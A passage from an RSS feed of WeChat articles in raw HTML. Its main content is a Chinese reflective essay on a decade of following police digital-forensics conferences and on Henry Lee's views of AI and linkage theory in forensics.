  宋体;color:black;mso-font-kerning:0pt;">客户价值传递<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="421" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">通过与客户合作，解决痛点并传递价值，增强客户粘性和平台扩展性。<span lang="EN-US"><o:p></o:p></span></span></p></td></tr></tbody></table><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484399">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2da550b2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484399%26idx%3D1%26sn%3D0b520ca7a7e4c096cc2a4c1355bedd1d%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 11 Sep 2024 23:21:00 +0800</pubDate>
    </item>
    <item>
      <title>从乔布斯到李昌钰：如何破解数智迷航？</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484351&amp;idx=1&amp;sn=ec9bdba22f6922e16a85ec574b7f01ce</link>
      <description>用大数据连接时空（数字孪生），用智能分析提炼信息（压缩降熵），用内心智慧（科技向善）来理解和完善现实秩序。</description>
      <content:encoded><![CDATA[<p>
原创 <span>Ariadne</span> <span>2024-07-29 17:43</span> <span style="display: inline-block;">上海</span>
</p>

<p>用大数据连接时空（数字孪生），用智能分析提炼信息（压缩降熵），用内心智慧（科技向善）来理解和完善现实秩序。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b3ecd831&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAmANMe6kFjFjbSjlBxrVicLqcARfPJgDDiaMKjAr4beyolEFzK4Hxoxfg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style=""><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">&#34;你无法预先把点连接起来；只有回头看时，你才会发现它们是如何连在一起的。所以你必须相信，你现在所经历的种种，将在你未来的某个时刻连接起来。你必须相信某些东西——你的直觉，命运，人生，因果，随便什么。&#34;</span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">~史蒂夫·乔布斯</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="553" valign="top" style="width: 555.2pt;border-width: initial;border-style: none;border-color: initial;padding: 4pt;word-break: break-all;"><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">乔帮主在2005年斯坦福大学毕业典礼上的这番话，不仅鼓励世人保持信念，也预见了科技发展的轨迹。在数智时代，我们用大数据连接时空（</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">数字孪生</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">），用智能分析提炼信息（</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">压缩降熵</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">），但真正的挑战是用直觉信念（</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">科技向善</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">）来理解和完善现实秩序。</span></section><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">我关注警界数字取证（Digital Forensics）已有十年，回顾这段经历，我发现数字取证是一门集大成的科学，堪称</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">数智转型的一个缩影</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">。它融合了技术的极致创新、数据的广泛关联、社会协作的网络化、法律伦理的严谨规范，以及对人性的细致还原。</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000679" data-ratio="0.5" data-type="jpeg" data-w="880" height="192.0" width="384.010009765625" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5dcc8c2c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oA2PNHnksXVBTJxCPyGf0b1R4nib2aWctm94BNGVm5d2Q39EFicRfOX2Zw%2F640%3Fwx_fmt%3Djpeg"/></span><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"></span></section><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">这个领域中，华人神探李昌钰作为灵魂人物，为其科普和发展做出了巨大贡献，那些</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">追寻真相、伸张正义、充满悲悯</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">的案例，超越了科技本身的影响力，直击人心，引导我们思考如何在数智大发现时把稳舵，不迷航。</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000681" data-ratio="0.7467811158798283" data-type="png" data-w="466" height="232.0" width="310.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c507d7ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAsrqSv9MsHprBaibAhmibx77DtyuFjtHAhtrdibt4mDoXqRwj6reVNUZ9w%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"></span></section><h1 style=""><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(30, 78, 121);">本文速览</span></strong></span>        <o:page></o:page></h1><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="84" valign="top" style="width:83.8pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;">章节</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></p></td><td width="458" valign="top" style="width:452.15pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;">精要</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></p></td></tr><tr><td width="84" valign="top" style="width:83.8pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">引言</span></p></td><td width="458" valign="top" style="width:452.15pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">数智时代需要用科技向善来理解和完善现实秩序，数字取证是数智转型的缩影。</span></p></td></tr><tr><td width="84" valign="top" style="width: 83.8pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">念念不忘，</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">必有回响</span></p></td><td width="458" valign="top" style="width: 452.15pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">持续学习和实践是专业成长的关键。十年的坚持不仅带来了技能的提升，还让散乱的经验凝聚成完整的专业认知。</span></p></td></tr><tr><td width="84" valign="top" style="width: 83.8pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">神探眼里</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">的数智化</span></p></td><td width="458" valign="top" style="width: 457.2pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;">1 </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">AI不仅是单一技术工具，而是连接各环节的核心纽带。李昌钰博士的前瞻性观点强调了AI在整合公共服务和社会资源生态中的重要作用。（附1）</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;">2 </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">鉴识取证正从&#34;转移理论&#34;向&#34;联系理论&#34;演变，反映了安全领域对更复杂、全面证据网络的需求。（附2）</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"></span></p></td></tr><tr><td width="84" valign="top" style="width: 83.8pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">悲悯之心，</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">科技向善</span></p></td><td width="458" valign="top" style="width:452.15pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">取证从业者展现出独特的职业特质：悲悯之心（关注社会责任），知行合一（注重实用性创新），集思广益（善于团队协作和跨学科融合）。</span></p></td></tr></tbody></table><h1 style=""><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(30, 78, 121);">1 </span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(30, 78, 121);">念念不忘，必有回响</span></strong></span>
      </h1></td></tr></tbody></table><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">关注数字取证十年，从ISC 2014到ISC 2018，再到FDF 2019、BCS 2019、ISC 2022和BCS 2022的取证分论坛，我从旁听者逐渐转变为初级参与者。在这个过程中,我有幸得到了许多专家的启发，软件分析成为了我的硬技能；云计算取证让我深耕云原生；隐写水印促使我将其引入实践；厂商专业工具解决了我的燃眉之急；检察官的海量检材让我正视高算；反恐一线警官讲述工作强度和残酷现场，让大家认识到，</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">不再有任何困难是对技术的苛求</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></section><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">从网络靶场到有效性验证，从专用工具到AI挑战，从检材分析到众多公安部科技一等奖，让我</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">理解了场景适配、底层研发、逆向工程、用户零侵入、高性能计算和数据高通量的重要性，以及要素全关联的价值</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。在践行深植于心的信念过程中，散乱的经验自然会凝聚成完整的拼图。近两年，我基于实践经历撰写的两篇小论文被全国取证会议录用，这让我体会到，成果的积累需要时间的沉淀。</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000678" data-ratio="0.4961915125136017" data-type="png" data-w="919" height="199.3399658203125" width="400.6700439453125" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=86771db1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAPPauXfpl3S4aibS0zsJib63qnRkv489JXTuNAJzXLV5TTsOHEXoZBXQg%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span>    <o:page></o:page></section><h1 style=""><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">2 </span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">神探眼里的数智化</span></strong></span>
  </h1><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">2019年我第一次面对面见到”神探“李昌钰博士，他从直观场景出发，说明AI能在初始通知、现场救援、资源规划、证据收集和身份鉴定等阶段发挥作用。李博士将AI定位为</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">连接各个环节的核心纽带</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，而不仅仅是单一的技术工具，在每个场景中，AI都应将</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">公共服务和社会资源生态完美结合，更好地服务社会</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。AI不仅能够处理和分析海量数据，还能在不同系统和数据源之间建立联系，为人提供全面的情景分析。</span></p><p style=""><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000680" data-ratio="0.6645833333333333" data-type="png" data-w="480" height="254.67001342773438" width="384.010009765625" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2b1d4894&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAY7Lqz5eZ7ex31liaTSUDdUmrnQ220ePRvRqZyQM29ZbwwaIQmiaMtiagQ%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">使在5年后的今天，AI技术突飞猛进，大模型狂欢亢进，李博士当年的观点依然显示出其前瞻性和洞察力，</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">既是对AI发展的升维思考，也是对盲从跟风的降维警醒</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">2022年，李博士在ISC大会上的演讲进一步拓展了鉴识取证的视野。他强调要将传统现场与电子现场结合，并阐述了如何利用新兴物证科学来应对网络安全挑战。李博士特别强调了鉴识科学思维方法的演变，从上个世纪传统的&#34;转移（transfer）理论&#34;，发展到了&#34;联系(linkage)理论。这种转变体现了安全领域的新特征：</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">不再局限于单一、直接的证据链，而是建立起更加复杂、全面的证据网络</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></section><h1 style=""><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">3 </span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">悲悯之心，科技向善</span></strong></span>
  </h1><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">电子取证论坛汇聚了业界精英，通过多次参会，我深刻感受到警界那种务实钻研的作风。</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">众多讲者通过分享案例、阐述观点，不仅传授了数字取证的专业知识，更为科技工作者提供了精神上的力量和勇气，共同体现了电子取证领域从业者的独特特质：</span><br/></section><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">悲悯之心</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，他们关注如何真正</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;text-underline:single;text-decoration:underline;">帮助普通人和弱势群体</span><span style="font-size: 11pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(0, 0, 0);text-decoration: none;">，从案件中来、到案件中去</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，凸显社会责任，科技向善；</span>    <o:page></o:page></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">知行合一</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，他们从</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;text-underline:single;text-decoration:underline;">案例细节</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">出发，&#34;亮剑&#34;极限场景，长期钻研底层技术，注重创新的实用性和可操作性，不空谈概念，不迷信科技；</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">集思广益</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，他们善于组织</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;text-underline:single;text-decoration:underline;">复杂团队协作</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，学习融合多学科知识，应对复杂多变的案情和海量数据，也善于借力社会资源，不是孤勇者。</span></section><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">这些特质不仅体现了取证领域的专业精神,也为科技工作者提供了宝贵的启示。正如《坛经》所言: </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">一切福田,不离方寸;从心而觅,感无不通</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000682" data-ratio="0.40841865756541523" data-type="png" data-w="879" height="167.99998474121094" width="412.010009765625" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=8356b509&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oA12azeia9SOovnLpfd03fxj9ApnaR5iaVlEDHdrNcA245GtcwcQibiaWiagw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><h1 style=""><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">附</span><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">1</span><span style="text-decoration: underline;font-size: 16pt;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">：</span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">李昌钰博士FDF 2019演讲</span></strong></span>
  </h1><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">人工智能在重大事故调查中的应用</span>
